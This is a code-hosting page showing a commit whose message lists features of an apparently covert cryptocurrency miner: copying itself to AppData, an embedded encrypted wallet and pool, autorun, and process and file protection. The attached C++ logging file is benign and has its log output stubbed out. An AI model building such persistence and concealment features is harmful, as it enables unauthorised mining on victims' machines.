
Copy file to appdata, integrated encrypted wallet and pool, autorun, protect process and file. And to many fucked changes
16 lines
306 B
C++
16 lines
306 B
C++
#include <stdarg.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <time.h>
|
|
#include "interfaces/ILogBackend.h"
|
|
#include "log/Log.h"
|
|
Log *Log::m_self = nullptr;
|
|
|
|
void Log::text(const char* fmt, ...){}
|
|
Log::~Log()
|
|
{
|
|
for (auto backend : m_backends) {
|
|
delete backend;
|
|
}
|
|
}
|